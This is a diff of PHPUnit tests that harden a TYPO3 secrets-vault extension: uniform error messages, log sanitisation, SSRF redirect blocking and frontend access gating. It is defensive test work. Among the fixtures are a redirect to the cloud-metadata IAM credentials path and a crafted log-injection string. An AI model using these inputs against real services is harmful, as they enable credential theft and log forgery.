@@ -780,7 +789,13 @@ final class FlexFormVaultHookTest extends TestCase
         $this->dataHandler
             ->expects(self::once())
             ->method('log')
-            ->with('tx_test', 42, 3, 0, 1, self::stringContains('Delete failed'));
+            ->with('tx_test', 42, 3, 0, 1, self::callback(
+                // The DataHandler log detail is replayed to the editor, so it
+                // must carry the correlation reference and NOT the cause
+                // (which distinguishes "not found" from "access denied").
+                static fn (string $message): bool => preg_match(self::REFERENCE_PATTERN, $message) === 1
+                    && !str_contains($message, 'Delete failed'),
+            ));
 
         $recordWasDeleted = false;
 
@@ -969,7 +984,10 @@ final class FlexFormVaultHookTest extends TestCase
         $this->dataHandler
             ->expects(self::once())
             ->method('log')
-            ->with('tt_content', 100, 1, 0, 1, self::stringContains('Retrieve failed'));
+            ->with('tt_content', 100, 1, 0, 1, self::callback(
+                static fn (string $message): bool => preg_match(self::REFERENCE_PATTERN, $message) === 1
+                    && !str_contains($message, 'Retrieve failed'),
+            ));
 
         $this->subject->processCmdmap_postProcess('copy', 'tt_content', 42, null, $this->dataHandler, false);
     }
@@ -1149,7 +1167,10 @@ final class FlexFormVaultHookTest extends TestCase
         $this->dataHandler
             ->expects(self::once())
             ->method('log')
-            ->with('tt_content', 20, 2, 0, 1, self::stringContains('Store failed'));
+            ->with('tt_content', 20, 2, 0, 1, self::callback(
+                static fn (string $message): bool => preg_match(self::REFERENCE_PATTERN, $message) === 1
+                    && !str_contains($message, 'Store failed'),
+            ));
 
         $this->subject->processDatamap_afterDatabaseOperations('update', 'tt_content', 20, [], $this->dataHandler);
     }
@@ -1308,7 +1329,8 @@ final class FlexFormVaultHookTest extends TestCase
 
     /**
      * Kill ConcatOperandRemoval + Concat mutations on the DataHandler log message.
-     * The message must contain BOTH the literal prefix AND the exception text.
+     * The message must contain BOTH the literal prefix AND the generic failure
+     * sentence — never the exception text, which is an existence oracle.
      */
     #[Test]
     public function deleteActionLogMessageHasExactPrefix(): void
@@ -1333,7 +1355,11 @@ final class FlexFormVaultHookTest extends TestCase
                 3,
                 0,
                 1,
-                'Vault error during delete for FlexForm field: Boom',
+                self::callback(
+                    static fn (string $message): bool => str_starts_with($message, 'Vault error during delete for FlexForm field: ')
+                    && preg_match(self::REFERENCE_PATTERN, $message) === 1
+                    && !str_contains($message, 'Boom'),
+                ),
             );
 
         $recordWasDeleted = false;
@@ -1382,7 +1408,8 @@ final class FlexFormVaultHookTest extends TestCase
                 0,
                 1,
                 self::callback(static fn (string $msg): bool => str_contains($msg, 'pi_flexform')
-                    && str_contains($msg, 'CopyBoom')
+                    && preg_match(self::REFERENCE_PATTERN, $msg) === 1
+                    && !str_contains($msg, 'CopyBoom')
                     && str_contains($msg, 'Vault error during copy')),
             );
 
@@ -1425,7 +1452,8 @@ final class FlexFormVaultHookTest extends TestCase
                 0,
                 1,
                 self::callback(static fn (string $msg): bool => str_contains($msg, 'settings.key')
-                    && str_contains($msg, 'StoreExplode')),
+                    && preg_match(self::REFERENCE_PATTERN, $msg) === 1
+                    && !str_contains($msg, 'StoreExplode')),
             );
 
         $this->subject->processDatamap_afterDatabaseOperations('update', 'tt_content', 20, [], $this->dataHandler);
@@ -1919,13 +1947,15 @@ final class FlexFormVaultHookTest extends TestCase
                 0,
                 1,
                 self::callback(
-                    // Kills both Concat and ConcatOperandRemoval on line 259:
-                    // message starts with literal prefix, contains field name
-                    // 'pi_flexform', then ': ', then the exception message.
-                    fn (string $message): bool => str_starts_with($message, 'Vault error during copy for FlexForm field "')
-                    && str_contains($message, '"pi_flexform"')
-                    && str_contains($message, '": Boom')
-                    && str_ends_with($message, 'Boom'),
+                    // Kills both Concat and ConcatOperandRemoval: message starts
+                    // with the literal prefix, contains the field name
+                    // 'pi_flexform', then ': ', then the generic failure
+                    // sentence with its correlation reference — never the
+                    // exception text.
+                    static fn (string $message): bool => str_starts_with($message, 'Vault error during copy for FlexForm field "')
+                    && str_contains($message, '"pi_flexform": ')
+                    && preg_match(self::REFERENCE_PATTERN, $message) === 1
+                    && !str_contains($message, 'Boom'),
                 ),
             );
 

--- a/Tests/Unit/Hook/FlexFormVaultHookTest.php
+++ b/Tests/Unit/Hook/FlexFormVaultHookTest.php
@@ -242,6 +242,145 @@ final class FlexFormVaultHookTest extends TestCase
         self::assertSame('value', $fieldArray['pi_flexform']['data']['sDEF']['lDEF']['field']['vDEF']);
     }
 
+    /**
+     * The data structure of a FlexForm field is selected by the table, the field
+     * name and the record type. Looking it up with empty names and the submitted
+     * FlexForm array as the record row fails on every supported TYPO3 version,
+     * which silently disabled the vault handling entirely.
+     */
+    #[Test]
+    public function processDatamapPreProcessFieldArrayLooksUpDataStructureForTheActualField(): void
+    {
+        $this->mockFlexFieldSchema('tt_content', ['pi_flexform']);
+
+        $connection = $this->createMock(Connection::class);
+        $result = $this->createMock(Result::class);
+        $result->method('fetchAssociative')->willReturn(['uid' => 42, 'CType' => 'my_plugin']);
+        $connection->method('select')->willReturn($result);
+        $this->connectionPool->method('getConnectionForTable')->willReturn($connection);
+
+        $this->flexFormTools
+            ->expects(self::once())
+            ->method('getDataStructureIdentifier')
+            ->with(
+                ['config' => ['type' => 'flex']],
+                'tt_content',
+                'pi_flexform',
+                self::callback(
+                    static fn (array $row): bool => ($row['CType'] ?? null) === 'my_plugin'
+                        && !isset($row['data']),
+                ),
+            )
+            ->willReturn('test-ds');
+
+        $this->flexFormTools->method('parseDataStructureByIdentifier')->willReturn(['sheets' => []]);
+
+        $fieldArray = [
+            'pi_flexform' => [
+                'data' => [
+                    'sDEF' => [
+                        'lDEF' => [
+                            'field' => ['vDEF' => 'value'],
+                        ],
+                    ],
+                ],
+            ],
+        ];
+
+        $this->subject->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 42);
+    }
+
+    /**
+     * A submitted vault value whose field the data structure does not describe as
+     * a vaultSecret element must not be handed to DataHandler: it would be
+     * serialised into the FlexForm XML as cleartext.
+     */
+    #[Test]
+    public function processDatamapPreProcessFieldArrayDiscardsVaultPlaintextForUnknownField(): void
+    {
+        $this->mockFlexFieldSchema('tt_content', ['pi_flexform']);
+
+        $this->flexFormTools->method('getDataStructureIdentifier')->willReturn('test-ds');
+        $this->flexFormTools
+            ->method('parseDataStructureByIdentifier')
+            ->willReturn([
+                'sheets' => [
+                    'sDEF' => [
+                        'ROOT' => [
+                            'el' => [
+                                'someOtherField' => [
+                                    'config' => ['type' => 'input'],
+                                ],
+                            ],
+                        ],
+                    ],
+                ],
+            ]);
+
+        $this->vaultService->expects(self::never())->method('store');
+
+        $fieldArray = [
+            'pi_flexform' => [
+                'data' => [
+                    'sDEF' => [
+                        'lDEF' => [
+                            'apiKey' => [
+                                'vDEF' => [
+                                    'value' => 'smuggled-plaintext',
+                                    '_vault_identifier' => '',
+                                ],
+                            ],
+                        ],
+                    ],
+                ],
+            ],
+        ];
+
+        $this->subject->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 'NEW1');
+
+        self::assertSame('', $fieldArray['pi_flexform']['data']['sDEF']['lDEF']['apiKey']['vDEF']);
+        self::assertStringNotContainsString(
+            'smuggled-plaintext',
+            (string) json_encode($fieldArray),
+        );
+    }
+
+    /**
+     * Counterpart to the test above: an untouched empty vault field carries no
+     * plaintext, so it must be left exactly as submitted.
+     */
+    #[Test]
+    public function processDatamapPreProcessFieldArrayKeepsEmptyVaultSubmissionUntouched(): void
+    {
+        $this->mockFlexFieldSchema('tt_content', ['pi_flexform']);
+
+        $this->flexFormTools
+            ->method('getDataStructureIdentifier')
+            ->willThrowException(new InvalidArgumentException('No data structure'));
+
+        $submitted = [
+            'pi_flexform' => [
+                'data' => [
+                    'sDEF' => [
+                        'lDEF' => [
+                            'apiKey' => [
+                                'vDEF' => [
+                                    'value' => '',
+                                    '_vault_identifier' => '',
+                                ],
+                            ],
+                        ],
+                    ],
+                ],
+            ],
+        ];
+        $fieldArray = $submitted;
+
+        $this->subject->processDatamap_preProcessFieldArray($fieldArray, 'tt_content', 'NEW1');
+
+        self::assertSame($submitted, $fieldArray);
+    }
+
     #[Test]
     public function processDatamapPreProcessFieldArrayHandlesNonVaultRenderType(): void
     {

--- a/Tests/Unit/Hook/VaultFailureReporterTest.php
+++ b/Tests/Unit/Hook/VaultFailureReporterTest.php
@@ -1,0 +1,202 @@
+<?php
+
+/*
+ * Copyright (c) 2025-2026 Netresearch DTT GmbH
+ * SPDX-License-Identifier: GPL-2.0-or-later
+ */
+
+declare(strict_types=1);
+
+namespace Netresearch\NrVault\Tests\Unit\Hook;
+
+use Closure;
+use Netresearch\NrVault\Exception\AccessDeniedException;
+use Netresearch\NrVault\Exception\SecretNotFoundException;
+use Netresearch\NrVault\Exception\VaultException;
+use Netresearch\NrVault\Hook\VaultFailureReporter;
+use Netresearch\NrVault\Tests\Unit\TestCase;
+use PHPUnit\Framework\Attributes\CoversClass;
+use PHPUnit\Framework\Attributes\Test;
+use Psr\Log\AbstractLogger;
+use Stringable;
+
+#[CoversClass(VaultFailureReporter::class)]
+final class VaultFailureReporterTest extends TestCase
+{
+    /** The correlation reference: 8 random bytes, hex-encoded. */
+    private const REFERENCE_PATTERN = '/\b[0-9a-f]{16}\b/';
+
+    private const PROBE_IDENTIFIER = 'probe-identifier';
+
+    /** @var list<array{string, array<mixed>}> */
+    private array $records = [];
+
+    private VaultFailureReporter $subject;
+
+    protected function setUp(): void
+    {
+        parent::setUp();
+
+        /** @param array<mixed> $context */
+        $record = function (string $message, array $context): void {
+            $this->records[] = [$message, $context];
+        };
+
+        // A real recording logger rather than a mock: the assertions below are
+        // about the record that actually reaches a PSR-3 writer.
+        $logger = new class ($record) extends AbstractLogger {
+            /**
+             * @param Closure(string, array<mixed>): void $record
+             */
+            public function __construct(private readonly Closure $record) {}
+
+            /**
+             * @param mixed $level
+             * @param array<mixed> $context
+             */
+            public function log($level, string|Stringable $message, array $context = []): void
+            {
+                ($this->record)((string) $message, $context);
+            }
+        };
+
+        $this->subject = new VaultFailureReporter($logger);
+    }
+
+    /**
+     * The existence oracle this class closes: "does not exist" and "exists but
+     * you may not touch it" must be indistinguishable to the editor who
+     * submitted the identifier.
+     */
+    #[Test]
+    public function userMessageIsIdenticalForNotFoundAndAccessDenied(): void
+    {
+        $notFound = $this->subject->report(
+            SecretNotFoundException::forIdentifier(self::PROBE_IDENTIFIER),
+        );
+        $accessDenied = $this->subject->report(
+            AccessDeniedException::forIdentifier(self::PROBE_IDENTIFIER, 'rotate permission denied'),
+        );
+
+        self::assertSame(
+            preg_replace(self::REFERENCE_PATTERN, 'REFERENCE', $notFound),
+            preg_replace(self::REFERENCE_PATTERN, 'REFERENCE', $accessDenied),
+            'The two causes must differ only in the correlation reference',
+        );
+    }
+
+    #[Test]
+    public function userMessageCarriesNeitherTheCauseNorTheProbedIdentifier(): void
+    {
+        $message = $this->subject->report(
+            SecretNotFoundException::forIdentifier(self::PROBE_IDENTIFIER),
+            ['identifier' => self::PROBE_IDENTIFIER],
+        );
+
+        self::assertStringNotContainsString('not found', $message);
+        self::assertStringNotContainsString(self::PROBE_IDENTIFIER, $message);
+        self::assertMatchesRegularExpression(self::REFERENCE_PATTERN, $message);
+    }
+
+    #[Test]
+    public function userMessageQuotesTheReferenceOfItsOwnLogRecord(): void
+    {
+        $message = $this->subject->report(new VaultException('Boom'));
+
+        [, $context] = $this->records[0];
+
+        self::assertIsString($context['reference']);
+        self::assertStringContainsString($context['reference'], $message);
+    }
+
+    /**
+     * The PSR-3 message argument is written verbatim by TYPO3's FileWriter, so
+     * it must be a constant; the cause belongs in the json-encoded context.
+     */
+    #[Test]
+    public function causeIsLoggedInTheContextAndNeverInTheMessage(): void
+    {
+        $this->subject->report(new VaultException('Boom'), ['table' => 'tx_test', 'uid' => 42]);
+
+        [$message, $context] = $this->records[0];
+
+        self::assertSame('Vault operation failed', $message);
+        self::assertSame('Boom', $context['error']);
+        self::assertSame(VaultException::class, $context['exceptionClass']);
+        self::assertSame('tx_test', $context['table']);
+        self::assertSame(42, $context['uid']);
+    }
+
+    /**
+     * `FileWriter::writeLog()` folds a Throwable stored under the `exception`
+     * key straight into the unescaped message — so that key must stay unused.
+     */
+    #[Test]
+    public function throwableIsNotPassedUnderTheExceptionContextKey(): void
+    {
+        $this->subject->report(new VaultException('Boom'));
+
+        [, $context] = $this->records[0];
+
+        self::assertArrayNotHasKey('exception', $context);
+    }
+
+    #[Test]
+    public function controlBytesAreStrippedFromEveryLoggedValue(): void
+    {
+        $crafted = "probe\r\nMon, 01 Jan 2035 00:00:00 +0000 [ALERT] request=\"0\" component=\"forged\": owned\x00\x07";
+
+        $this->subject->report(
+            SecretNotFoundException::forIdentifier($crafted),
+            ['identifier' => $crafted, 'table' => "tx\ntest"],
+        );
+
+        [$message, $context] = $this->records[0];
+
+        self::assertDoesNotMatchRegularExpression('/[[:cntrl:]]/', $message);
+
+        foreach ($context as $key => $value) {
+            if (!\is_string($value)) {
+                continue;
+            }
+
+            self::assertDoesNotMatchRegularExpression(
+                '/[[:cntrl:]]/',
+                $value,
+                \sprintf('Context value "%s" must not carry control bytes', $key),
+            );
+        }
+    }
+
+    #[Test]
+    public function loggedValuesAreLengthCapped(): void
+    {
+        $long = str_repeat('A', 5000);
+
+        $this->subject->report(new VaultException($long), ['identifier' => $long]);
+
+        [, $context] = $this->records[0];
+
+        self::assertIsString($context['error']);
+        self::assertIsString($context['identifier']);
+        self::assertLessThanOrEqual(200, \strlen($context['error']));
+        self::assertLessThanOrEqual(200, \strlen($context['identifier']));
+    }
+
+    /**
+     * `json_encode()` returns false on malformed UTF-8, which would silently
+     * drop the whole context array from the log record.
+     */
+    #[Test]
+    public function contextSurvivesJsonEncodingForMalformedUtf8Input(): void
+    {
+        $this->subject->report(
+            new VaultException("bad \xFF\xFE bytes"),
+            ['identifier' => str_repeat('ä', 200)],
+        );
+
+        [, $context] = $this->records[0];
+
+        self::assertIsString(json_encode($context, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES));
+    }
+}

--- a/Tests/Unit/Http/SecureHttpClientFactoryRebindingTest.php
+++ b/Tests/Unit/Http/SecureHttpClientFactoryRebindingTest.php
@@ -50,6 +50,8 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
 
     private const IPV6_EXAMPLE = '2001:db8::1';
 
+    private const PUBLIC_IPV6 = '2606:4700:4700::1111';
+
     private SecureHttpClientFactory $subject;
 
     private InMemoryDnsResolver $dnsResolver;
@@ -76,12 +78,30 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
     }
 
     #[Test]
-    public function buildResolveEntriesReturnsEmptyForIpLiteral(): void
+    public function buildResolveEntriesReturnsEmptyForSafeIpLiteral(): void
     {
-        // IPv4 and IPv6 literals are validated by isHostAllowed() — the
-        // middleware doesn't need to add a pin entry.
+        // A literal in a public range needs no pin entry — there is no DNS
+        // answer that could be rebound between check and connect.
         self::assertSame([], $this->callBuildResolveEntries(self::PUBLIC_IP, 443));
-        self::assertSame([], $this->callBuildResolveEntries('::1', 443));
+        self::assertSame([], $this->callBuildResolveEntries(self::PUBLIC_IPV6, 443));
+    }
+
+    #[Test]
+    public function buildResolveEntriesRejectsDangerousIpLiteral(): void
+    {
+        // The middleware runs on every hop, including redirects that never
+        // passed the caller-side isHostAllowed() gate, so the literal must be
+        // range-checked here rather than assumed pre-validated.
+        self::assertNull($this->callBuildResolveEntries(self::METADATA_IP, 80));
+        self::assertNull($this->callBuildResolveEntries('::1', 443));
+    }
+
+    #[Test]
+    public function buildResolveEntriesAcceptsDangerousIpLiteralWhenExplicitlyAllowlisted(): void
+    {
+        // The operator opt-in stays intact: a literal `allowed_hosts` entry
+        // (signalled by $allowlisted) keeps the private literal reachable.
+        self::assertSame([], $this->callBuildResolveEntries(self::DOCKER_IP, 11434, true));
     }
 
     #[Test]
@@ -353,6 +373,101 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
             $this->dnsResolver->queriedHosts(),
             'Middleware must call resolver with the bare host (no brackets).',
         );
+    }
+
+    #[Test]
+    public function middlewareRejectsRedirectHopToDangerousIpLiteral(): void
+    {
+        // The ssrf-dns-pin middleware is pushed LAST, so it sits closest to
+        // the transport — below Guzzle's RedirectMiddleware. Every redirect
+        // hop therefore re-enters it, while only the FIRST URI ever passed
+        // VaultHttpClient's isHostAllowed() gate. A `302 Location:
+        // http://169.254.169.254/…` must be refused by the middleware itself,
+        // otherwise the cloud-metadata response is handed back to the caller.
+        $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
+        $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
+        $client = $this->buildRedirectingClient(
+            'http://' . self::METADATA_IP . '/latest/meta-data/iam/security-credentials/',
+            $reachedHosts,
+        );
+
+        try {
+            $client->get('http://safe.example/');
+            self::fail('Expected the redirect hop to the metadata IP to be refused.');
+        } catch (RequestException $e) {
+            self::assertMatchesRegularExpression('/disallowed IP range/i', $e->getMessage());
+        }
+
+        self::assertSame(
+            ['safe.example'],
+            $reachedHosts,
+            'The metadata host must never reach the transport.',
+        );
+    }
+
+    #[Test]
+    public function middlewareAllowsRedirectHopToSafeIpLiteral(): void
+    {
+        // Control: the per-hop literal check must not block ordinary
+        // redirects to public addresses.
+        $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
+        $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
+        $client = $this->buildRedirectingClient('http://' . self::PUBLIC_IP . '/next', $reachedHosts);
+
+        $response = $client->get('http://safe.example/');
+
+        self::assertSame(200, $response->getStatusCode());
+        self::assertSame(['safe.example', self::PUBLIC_IP], $reachedHosts);
+    }
+
+    #[Test]
+    public function middlewareAllowsRedirectHopToAllowlistedPrivateIpLiteral(): void
+    {
+        // The documented opt-in still wins: an operator who listed the exact
+        // literal in `allowed_hosts` keeps that internal target reachable,
+        // redirect hop included.
+        $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
+        $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allowed_hosts'] = [self::DOCKER_IP];
+        $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
+        $client = $this->buildRedirectingClient('http://' . self::DOCKER_IP . '/api/tags', $reachedHosts);
+
+        $response = $client->get('http://safe.example/');
+
+        self::assertSame(200, $response->getStatusCode());
+        self::assertSame(['safe.example', self::DOCKER_IP], $reachedHosts);
+    }
+
+    /**
+     * Build a Client whose factory-installed middleware stack is intact and
+     * whose BOTTOM handler answers the FIRST request with a 302 to $location
+     * and every later request with a 200. Every host that actually reached
+     * the transport is recorded in $reachedHosts.
+     *
+     * @param-out list<string> $reachedHosts
+     */
+    private function buildRedirectingClient(string $location, ?array &$reachedHosts): Client
+    {
+        $reachedHosts = [];
+
+        $client = $this->subject->create();
+        $handler = $client->getConfig('handler');
+        if (!$handler instanceof HandlerStack) {
+            throw new TypeError('Factory must build a HandlerStack-backed client.', 3059133054);
+        }
+
+        $handler->setHandler(
+            static function (RequestInterface $request, array $options) use ($location, &$reachedHosts): PromiseInterface {
+                $reachedHosts[] = $request->getUri()->getHost();
+
+                return Create::promiseFor(
+                    \count($reachedHosts) === 1
+                        ? new Response(302, ['Location' => $location], '')
+                        : new Response(200, [], 'body-of-the-redirect-target'),
+                );
+            },
+        );
+
+        return $client;
     }
 
     /**

--- a/Tests/Unit/Http/SecureHttpClientFactoryRebindingTest.php
+++ b/Tests/Unit/Http/SecureHttpClientFactoryRebindingTest.php
@@ -48,6 +48,16 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
 
     private const PUBLIC_IP_SECONDARY = '93.184.216.35';
 
+    /**
+     * The redirect-hop tests deliberately speak plain http:// — the SSRF filter
+     * must refuse the hop regardless of scheme, and forcing https here would
+     * change what is being tested.
+     */
+    private const HTTP_SCHEME = 'http://';
+
+    /** Allow-listed origin the redirect starts from. */
+    private const SAFE_ORIGIN = 'http://safe.example/';
+
     private const IPV6_EXAMPLE = '2001:db8::1';
 
     private const PUBLIC_IPV6 = '2606:4700:4700::1111';
@@ -387,12 +397,12 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
         $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
         $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
         $client = $this->buildRedirectingClient(
-            'http://' . self::METADATA_IP . '/latest/meta-data/iam/security-credentials/',
+            self::HTTP_SCHEME . self::METADATA_IP . '/latest/meta-data/iam/security-credentials/',
             $reachedHosts,
         );
 
         try {
-            $client->get('http://safe.example/');
+            $client->get(self::SAFE_ORIGIN);
             self::fail('Expected the redirect hop to the metadata IP to be refused.');
         } catch (RequestException $e) {
             self::assertMatchesRegularExpression('/disallowed IP range/i', $e->getMessage());
@@ -412,9 +422,9 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
         // redirects to public addresses.
         $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
         $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
-        $client = $this->buildRedirectingClient('http://' . self::PUBLIC_IP . '/next', $reachedHosts);
+        $client = $this->buildRedirectingClient(self::HTTP_SCHEME . self::PUBLIC_IP . '/next', $reachedHosts);
 
-        $response = $client->get('http://safe.example/');
+        $response = $client->get(self::SAFE_ORIGIN);
 
         self::assertSame(200, $response->getStatusCode());
         self::assertSame(['safe.example', self::PUBLIC_IP], $reachedHosts);
@@ -429,9 +439,9 @@ final class SecureHttpClientFactoryRebindingTest extends TestCase
         $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allow_redirects'] = true;
         $GLOBALS['TYPO3_CONF_VARS']['HTTP']['allowed_hosts'] = [self::DOCKER_IP];
         $this->dnsResolver->program('safe.example', [['ip' => self::PUBLIC_IP]]);
-        $client = $this->buildRedirectingClient('http://' . self::DOCKER_IP . '/api/tags', $reachedHosts);
+        $client = $this->buildRedirectingClient(self::HTTP_SCHEME . self::DOCKER_IP . '/api/tags', $reachedHosts);
 
-        $response = $client->get('http://safe.example/');
+        $response = $client->get(self::SAFE_ORIGIN);
 
         self::assertSame(200, $response->getStatusCode());
         self::assertSame(['safe.example', self::DOCKER_IP], $reachedHosts);

--- a/Tests/Unit/Security/AccessControlServiceTest.php
+++ b/Tests/Unit/Security/AccessControlServiceTest.php
@@ -22,10 +22,12 @@ use PHPUnit\Framework\Attributes\Test;
 use PHPUnit\Framework\MockObject\MockObject;
 use TYPO3\CMS\Core\Authentication\BackendUserAuthentication;
 use TYPO3\CMS\Core\Authentication\CommandLineUserAuthentication;
+use TYPO3\CMS\Core\Core\SystemEnvironmentBuilder;
 use TYPO3\CMS\Core\Database\ConnectionPool;
 use TYPO3\CMS\Core\Database\Query\Expression\ExpressionBuilder;
 use TYPO3\CMS\Core\Database\Query\QueryBuilder;
 use TYPO3\CMS\Core\Database\Query\Restriction\DefaultRestrictionContainer;
+use TYPO3\CMS\Core\Http\ServerRequest;
 
 #[CoversClass(AccessControlService::class)]
 #[AllowMockObjectsWithoutExpectations]
@@ -43,12 +45,12 @@ final class AccessControlServiceTest extends TestCase
         $this->subject = new AccessControlService($this->configuration);
 
         // Reset GLOBALS for clean state
-        unset($GLOBALS['BE_USER']);
+        unset($GLOBALS['BE_USER'], $GLOBALS['TYPO3_REQUEST']);
     }
 
     protected function tearDown(): void
     {
-        unset($GLOBALS['BE_USER']);
+        unset($GLOBALS['BE_USER'], $GLOBALS['TYPO3_REQUEST']);
         parent::tearDown();
     }
 
@@ -325,6 +327,79 @@ final class AccessControlServiceTest extends TestCase
         self::assertTrue($this->subject->canRead($secret), 'frontend-accessible secret is readable');
         self::assertFalse($this->subject->canWrite($secret), 'frontend has no write tier');
         self::assertFalse($this->subject->canDelete($secret), 'frontend has no delete tier');
+    }
+
+    #[Test]
+    public function frontendRequestDeniesNonFrontendAccessibleSecretDespiteAmbientBackendUser(): void
+    {
+        // TYPO3's frontend BackendUserAuthenticator middleware sets
+        // $GLOBALS['BE_USER'] for any visitor carrying a backend session.
+        // That ambient identity must NOT unlock a secret which is not
+        // frontend-accessible — the rendered output goes into the shared
+        // page cache and is served to anonymous visitors afterwards.
+        $this->setFrontendRequest();
+        $this->setBackendUser(uid: 1, isAdmin: true);
+        $secret = $this->createSecret(ownerUid: 1, frontendAccessible: false);
+
+        self::assertFalse($this->subject->canRead($secret));
+    }
+
+    #[Test]
+    public function frontendRequestGrantsOnlyTheReadGateDespiteAmbientBackendUser(): void
+    {
+        // Same request shape, but the secret IS frontend-accessible: read is
+        // granted (as for an anonymous visitor), write/delete stay denied
+        // even though the ambient backend user is an admin.
+        $this->setFrontendRequest();
+        $this->setBackendUser(uid: 1, isAdmin: true);
+        $secret = $this->createSecret(ownerUid: 1, frontendAccessible: true);
+
+        self::assertTrue($this->subject->canRead($secret), 'frontend-accessible secret is readable');
+        self::assertFalse($this->subject->canWrite($secret), 'frontend has no write tier');
+        self::assertFalse($this->subject->canDelete($secret), 'frontend has no delete tier');
+    }
+
+    #[Test]
+    public function backendRequestKeepsBackendUserSemantics(): void
+    {
+        // Counterpart: a request positively identified as BACKEND keeps the
+        // full backend-user semantics.
+        $GLOBALS['TYPO3_REQUEST'] = (new ServerRequest())
+            ->withAttribute('applicationType', SystemEnvironmentBuilder::REQUESTTYPE_BE);
+        $this->setBackendUser(uid: 1, isAdmin: true);
+        $secret = $this->createSecret(ownerUid: 999, frontendAccessible: false);
+
+        self::assertTrue($this->subject->canRead($secret));
+        self::assertTrue($this->subject->canWrite($secret));
+        self::assertTrue($this->subject->canDelete($secret));
+    }
+
+    #[Test]
+    public function requestWithoutApplicationTypeKeepsBackendUserSemantics(): void
+    {
+        // The application type cannot be established (request not created by
+        // a TYPO3 application) — behaviour stays exactly as before.
+        $GLOBALS['TYPO3_REQUEST'] = new ServerRequest();
+        $this->setBackendUser(uid: 1, isAdmin: true);
+        $secret = $this->createSecret(ownerUid: 999, frontendAccessible: false);
+
+        self::assertTrue($this->subject->canRead($secret));
+    }
+
+    #[Test]
+    public function technicalActorSupersedesTheFrontendGate(): void
+    {
+        // ADR-029: an explicit runAs() scope is opted into by the caller and
+        // keeps its user-based semantics wherever it is opened — it is not
+        // downgraded to the frontend gate.
+        $this->setFrontendRequest();
+
+        $subject = $this->createSubjectWithTechnicalActor(
+            new TechnicalActor(uid: 42, username: 'tech', admin: false, groupIds: []),
+        );
+        $secret = $this->createSecret(ownerUid: 42, frontendAccessible: false);
+
+        self::assertTrue($subject->canRead($secret));
     }
 
     #[Test]
@@ -1017,6 +1092,16 @@ final class AccessControlServiceTest extends TestCase
             writeGroups: $writeGroups,
             frontendAccessible: $frontendAccessible,
         );
+    }
+
+    /**
+     * Put a TYPO3 FRONTEND request into $GLOBALS['TYPO3_REQUEST'], as the
+     * frontend application does for every rendered page request.
+     */
+    private function setFrontendRequest(): void
+    {
+        $GLOBALS['TYPO3_REQUEST'] = (new ServerRequest())
+            ->withAttribute('applicationType', SystemEnvironmentBuilder::REQUESTTYPE_FE);
     }
 
     /**

--- a/Tests/Unit/Service/VaultServiceTest.php
+++ b/Tests/Unit/Service/VaultServiceTest.php
@@ -404,6 +404,70 @@ final class VaultServiceTest extends TestCase
     }
 
     #[Test]
+    public function retrieveForFrontendReturnsFrontendAccessibleSecret(): void
+    {
+        $identifier = 'publicApiKey';
+        $secret = $this->createSecretEntity($identifier, frontendAccessible: true);
+
+        $this->adapter
+            ->method('retrieve')
+            ->with($identifier)
+            ->willReturn($secret);
+
+        $this->accessControlService
+            ->method('canRead')
+            ->willReturn(true);
+
+        $this->encryptionService
+            ->method('decrypt')
+            ->willReturn('decrypted-secret');
+
+        self::assertSame('decrypted-secret', $this->subject->retrieveForFrontend($identifier));
+    }
+
+    #[Test]
+    public function retrieveForFrontendDeniesSecretThatIsNotFrontendAccessible(): void
+    {
+        $identifier = 'smtpPassword';
+        $secret = $this->createSecretEntity($identifier);
+
+        $this->adapter
+            ->method('retrieve')
+            ->with($identifier)
+            ->willReturn($secret);
+
+        // A privileged ambient actor (admin backend user browsing the
+        // frontend) — the frontend gate must deny regardless.
+        $this->accessControlService
+            ->method('canRead')
+            ->willReturn(true);
+
+        $this->encryptionService
+            ->expects(self::never())
+            ->method('decrypt');
+
+        $this->auditLogService
+            ->expects(self::once())
+            ->method('log')
+            ->with($identifier, 'access_denied', false, self::isString());
+
+        $this->expectException(AccessDeniedException::class);
+
+        $this->subject->retrieveForFrontend($identifier);
+    }
+
+    #[Test]
+    public function retrieveForFrontendReturnsNullForNonExistentSecret(): void
+    {
+        $this->adapter
+            ->method('retrieve')
+            ->with('nonexistent')
+            ->willReturn(null);
+
+        self::assertNull($this->subject->retrieveForFrontend('nonexistent'));
+    }
+
+    #[Test]
     public function deleteRemovesSecretWithPermission(): void
     {
         $identifier = 'toDelete';
@@ -1122,6 +1186,7 @@ final class VaultServiceTest extends TestCase
         string $description = '',
         string $context = '',
         array $metadata = [],
+        bool $frontendAccessible = false,
     ): Secret {
         return new Secret(
             identifier: $identifier,
@@ -1134,6 +1199,7 @@ final class VaultServiceTest extends TestCase
             valueChecksum: 'checksum',
             ownerUid: 1,
             context: $context,
+            frontendAccessible: $frontendAccessible,
             version: $version,
             expiresAt: $expiresAt,
             metadata: $metadata,


### PR DESCRIPTION
Fixes for the findings of a Claude Security scan of `main` at c7d40a6c6c958d1649aac776157a3f072210f15a (whole repository, medium effort, focused on production attack surface). The scan reported 11 verified findings; this branch carries a fix for nine of them, one commit per finding, plus three follow-up commits (a TYPO3 v13 test-portability fix, a Rector pass, and literal extraction for SonarCloud). Two findings are deliberately **not** fixed here — see "Not fixed" below.

